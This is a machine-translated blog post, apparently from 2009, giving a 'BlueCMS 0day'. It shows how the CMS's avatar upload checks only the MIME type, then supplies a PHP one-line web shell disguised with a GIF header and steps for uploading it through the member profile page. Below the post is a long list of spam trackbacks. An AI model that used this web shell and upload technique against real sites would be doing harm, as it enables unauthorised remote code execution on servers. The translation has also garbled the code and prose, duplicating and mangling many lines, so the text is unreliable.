आरएसएस

bluecms 0day

इस प्रवेश 07 अक्टूबर 2009 पर पोस्ट किया गया

: St0p
Reproduced किया स्रोत का संकेत कृपया: http://www.st0p.org

नोट: माफ करना, रात को सुबह बाल के संस्करण अखबार एक 0DAY दोहरी कहा जाता है, के बारे में बताया, और बस अधिकारी के जाने पर देखा, और एक सुरक्षा पैच आह जल्द ही जारी .. आप ऑनलाइन जा सकते हैं परीक्षण का अद्यतन संस्करण नहीं ...

काश, समूह मेरा एक दोस्त एक सीएमएस बनाया है, कुछ अंतःक्षिप्त किया जा सकता है उपयोगकर्ता डेटा को संशोधित करने के लिए कहा, स्थानीय स्तर पर स्थापित के बाद का उपयोग नहीं कर सकते हैं विश्लेषण के साथ, ने कहा कि एकल उद्धरण magic_quotes_gpc = बंद से बच रहे हैं. . .

/ Common.inc.php पंक्ति में शामिल हैं, छोड़ देना. . 

  एक
 2
 3
 4
 5
 6
 7
 8
 9

  ......
  ! get_magic_quotes_gpc ( ) ) अगर ((get_magic_quotes_gpc)!)
  {
 	 deep_addslashes ( $_POST ) ; $ _POST = Deep_addslashes ($ _POST);
 	 deep_addslashes ( $_GET ) ; $ _GET में = Deep_addslashes ($ _GET);
 	 deep_addslashes ( $_COOKIES ) ; _COOKIES $ में = Deep_addslashes ($ _COOKIES);
 	 deep_addslashes ( $_REQUEST ) ; $ _REQUEST में = Deep_addslashes ($ _REQUEST);
  }
 ......

शायद अच्छा भाग्य st0p के, भागों, कोड के विश्लेषण के चित्रों को अपलोड देखने के लिए, user.php में पाया कुछ का उपयोग करें. . 

  एक
 2
 3
 4
 5
 6

  BLUE_ROOT . 'include/upload.class.php' ) ; //调用上传类 require_once (BLUE_ROOT. / upload.class.php शामिल है), / / अपलोड वर्ग फोन
     new upload ( ) ; $ छवि = (अपलोड);
	  isset ( $_FILES [ 'face_pic' ] [ 'error' ] ) && $_FILES [ 'face_pic' ] [ 'error' ] == 0 ) { अगर (isset ($ _FILES [face_pic '] [' त्रुटि ']) _FILES $ && [face_pic'] ['त्रुटि'] == 0) {
		 $image -> img_upload ( $_FILES [ 'face_pic' ] , 'face_pic' ) ; छवि Face_pic $ = $ -> ($ _FILES [img_upload 'face_pic'], 'face_pic'); 
                          / / प्रत्यय सीधे पता नहीं लगा क्या में वर्ग शेल को पारित करने में सक्षम हो जाएगा
	 }

केवल फ़ाइल शीर्षक का पता लगाने के लिए शामिल हैं / upload.class.php खोलें प्रत्यय का पता नहीं लगा 

  एक
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27

  ......
 वर्ग अपलोड {
	 = array ( 'image/jpg' , 'image/gif' , 'image/png' , 'image/pjpeg' ) ; निजी $ allow_image_type = सरणी ('/ छवि jpg', 'छवि / gif, छवि / png', 'छवि / pjpeg');
 ......
     $file , $dir = '' , $imgname = '' ) { समारोह img_upload ($ फ़ाइल, $ dir ='' $ imgname ='') {
    	 empty ( $dir ) ) { एक अगर (खाली ($ dir)),
    		 BLUE_ROOT . DATA . UPLOAD . date ( "Ym" ) . "/" ; . $ दीर = BLUE_ROOT आंकड़े अपलोड (YM) दिनांक "/";
    	 { बाकी} {
    		 BLUE_ROOT . DATA . UPLOAD . $dir . "/" ; . $ दीर = BLUE_ROOT आंकड़े अपलोड $ / दीर;
    	 }

    	 ! file_exists ( $dir ) ) { अगर (file_exists ($ dir)!)
    		 ! mkdir ( $dir ) ) { {अगर (mkdir! $ (dir))
    			 ) ; showmsg (अपलोड करने की प्रक्रिया निर्देशिका बनाने में विफल ');
    		 }
    	 }
    	 empty ( $imgname ) ) { एक अगर (खाली imgname डॉलर),
    		 $this -> create_tempname ( ) . $this -> get_type ( $file [ 'name' ] ) ; $ Imgname = $ -> create_tempname () $ इस -> get_type ($ फ़ाइल ['नाम']);
    	 }
    	 $dir . $imgname ; $ Imgname = $ dir $ Imgname.
    	 ! in_array ( $file [ 'type' ] , $this -> allow_image_type ) ) { {अगर (allow_image_type>) in_array ($ फ़ाइल ['प्रकार'], $!)
              / / बस आगे करने के लिए फ़ाइल शीर्षक का पता लगाने के लिए, तो हम सीधे तरह एक शेल निर्माण
    		 ) ; showmsg (चित्र के प्रकार की अनुमति नहीं है ');
    	 }


     }

ऊपर बचाने के लिए st0p.php 

  एक
 2

  GIF89a
 ( $_POST [ st0p ] ) ; ?> Php eval (_POST $ [st0p]);?>

नोट नेटवर्क खाते में प्रवेश के सदस्य -> ​​मेरा प्रोफ़ाइल, तो चुनाव हम एक PHP फ़ाइल का निर्माण किया है, को संशोधित करने की पुष्टि, पता देखने के सफल है बिंदु के लिए नई छवि अपलोड, लाइन पर सीधे तस्वीर पर राइट - क्लिक करें. . शब्द शेल सफलतापूर्वक अपलोड!

bluecms-0day1

bluecms-0day2

विश्लेषण पूरा हो गया है, मुझे आशा है कि और अधिक आदान - प्रदान, इन बातों का मुद्दा सिर्फ कुछ दोस्तों के साथ मिलने के लिए प्रौद्योगिकी पर चर्चा करने के लिए, समूह के रूप में अच्छी तरह से, बस एक साधारण समूह, केवल 100 लोगों को, साफ, कभी बात नहीं की स्थापना करना चाहते हैं बुरी तरह अराजकता टी बी, उदास, खुला समूह विनिमय करने के लिए है, बात नहीं करते प्लेसहोल्डर जगह में किया गया है, भरी हुई प्रगति के लिए चाहते हैं, अलग सड़क नहीं जा सकते!
यदि आप समूह में सिर्फ दूसरों से दूसरों के विचार विमर्श के परिणाम प्राप्त करने के लिए, के लिए भुगतान करते हैं, या बस स्कूबा डाइविंग आना, या बिना पता नहीं है. . .

, , ,
· मार्शल कला धोखा देती जानें
Chinese (Simplified) flagItalian flagKorean flagChinese (Traditional) flagPortuguese flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flagGreek flagDutch flagBulgarian flagCzech flagCroatian flagDanish flagFinnish flagHindi flagPolish flagRomanian flagSwedish flagNorwegian flagCatalan flagFilipino flagHebrew flagIndonesian flagLatvian flagLithuanian flagSerbian flagSlovak flagSlovenian flagUkrainian flagVietnamese flagAlbanian flagEstonian flagGalician flagMaltese flagThai flagTurkish flagHungarian flag


"Bluecms 0day" के लिए 75 जवाब

  1. Хостинг पर 17 नवम्बर, 2009 By करके | उत्तर दें

    जावेद, verjetno zato जेई


  1. 74 सकते हैं (ओं)

  2. 8 जुलाई, 2011: शुरुआती गाइड पेंसिल आकर्षित,
  3. 21 दिसम्बर, 2011: बोस्टन टैक्सी
  4. 24 दिसम्बर, 2011: माली अंदर N8 के अंत झुकना
  5. 25 दिसम्बर, 2011: लैंडस्केप माली लंदन
  6. 6 जनवरी, 2012: eBook
  7. 17 जनवरी, 2012: निश्चित प्रौद्योगिकी supercubeï ¿ 6000 आधा
  8. 18 जनवरी, 2012: NUTRICION deportiva
  9. 19 जनवरी, 2012: वाटमान, निष्कर्षण thimbles
  10. 19 जनवरी, 2012: एक tiu
  11. 21 जनवरी, 2012: portarollo
  12. 24 जनवरी, 2012: antykwariaty
  13. 29 जनवरी, 2012: मैं »¿ अल्फा वारंटी सेवा,
  14. 29 जनवरी, 2012: अल्फा वारंटी सेवा
  15. 30 जनवरी, 2012: एनबीए भविष्यवाणियों
  16. 30 जनवरी, 2012: मनिस्टी शादी फोटोग्राफर
  17. 31 जनवरी, 2012: WoF क्राइस्टचर्च
  18. 31 जनवरी, 2012 के लिए मुफ्त सेक्स वीडियो
  19. 31 जनवरी, 2012: शरीर सौष्ठव टी शर्ट
  20. 4 फरवरी, 2012: एनएफएल बाधाओं
  21. 5 फरवरी, 2012: सुपर बाउल 46 शर्त कहाँ
  22. 6 फरवरी, 2012: पीठ की चोट
  23. 6 फरवरी, 2012: स्वतंत्र वर्गीकृत
  24. 7 फरवरी, 2012: सेंट जॉर्ज हाड वैद्य
  25. 7 फरवरी, 2012: clairvoyants ब्रिटेन
  26. 9 फरवरी, 2012: sportsbook सट्टेबाजी
  27. 9 फरवरी, 2012: फ़स्त खोलना तकनीशियन
  28. 10 फरवरी, 2012: माज़दा स्पेयर पार्ट्स
  29. 12 फरवरी, 2012: पोर्ट रिचमंड, NY में कार ताला
  30. 13 फरवरी, 2012: agustus
  31. 15 फरवरी, 2012: trycholog Gdynia
  32. 18 फरवरी, 2012: तेल परिवर्तन कूपन
  33. 19 फरवरी, 2012: शीर्ष एशियाई sportsbook
  34. 22 फरवरी, 2012: डोनाल्ड थोड़ा बॉबी abonnement बतख
  35. 22 फरवरी, 2012: ऑकलैंड drainlayer
  36. 25 फरवरी, 2012: मानसिक प्रकाश
  37. 26 फरवरी, 2012: ELEKTRIK
  38. 26 फरवरी, 2012: भौतिक चिकित्सा सहायक
  39. 1 मार्च, 2012: campers के दुनिया
  40. 3 मार्च, 2012: मनोविज्ञान
  41. 7 मार्च, 2012: अब्दुल मलिक
  42. 8 मार्च, 2012: घरों NZ
  43. 8 मार्च, 2012: गोल्फ स्विंग सहायता
  44. 10 मार्च, 2012: बढई का कमरा ऑकलैंड
  45. 12 मार्च, 2012: मानसिक रीडिंग
  46. 13 मार्च, 2012: मुर्गियाँ रात
  47. 14 मार्च, 2012: Aboubakar
  48. 18 मार्च, 2012: ऑनलाइन खेल
  49. 19 मार्च, 2012: Alisson
  50. 23 मार्च, 2012 एनबीए की पसंद
  51. Mar 23, 2012 नि: शुल्क मानसिक चैट
  52. 24 मार्च, 2012: सुरक्षा द्वार NZ
  53. 27 मार्च, 2012: लंबी पैदल यात्रा के भंडार
  54. 29 मार्च, 2012: ऑकलैंड अंदर आराम घरों
  55. 30 मार्च, 2012: सर्वेयर ऑकलैंड
  56. 31 मार्च, 2012: ऑनलाइन मछली की दुकान
  57. 3 अप्रैल, 2012: Ares, मुफ्त डाउनलोड करें
  58. 7 अप्रैल, 2012: szkola jazdy गडिनिया opinie
  59. 10 अप्रैल, 2012: antykwariaty
  60. अपरैल 18, 2012: अंधा कर रही है
  61. 18 अप्रैल, 2012: Dre द्वारा नि: शुल्क बीट्स
  62. 20 अप्रैल, 2012: फिजी पैकेज
  63. 22 अप्रैल, 2012: साइट विपणन
  64. अपरैल 22, 2012: treehouses
  65. 22 अप्रैल, 2012: गतिशील इन्सुलेशन
  66. अपरैल 22, 2012: जनजातीय टैटू
  67. 22 अप्रैल, 2012: रैंकिंग एसईओ सेवाओं,
  68. अपरैल 22, 2012: आपूर्ति श्रृंखला प्रबंधन पाठ्यक्रम,
  69. 22 अप्रैल, 2012: सीआईए टेस्ट तैयारी
  70. 24 अप्रैल, 2012: विंडोज़ ऑकलैंड
  71. 24 अप्रैल, 2012: चैनल, घड़ियाँ
  72. 3 मई, 2012: कार बीमा उद्धरण
  73. 6 मई, 2012: सौर
  74. 6 मई, 2012: व्यापार के मूल्यांकन
  75. 13 मई, 2012: स्वीकर्ता bestamp विपरीत करने के लिए

आप होना चाहिए लॉग इन एक टिप्पणी पोस्ट करने.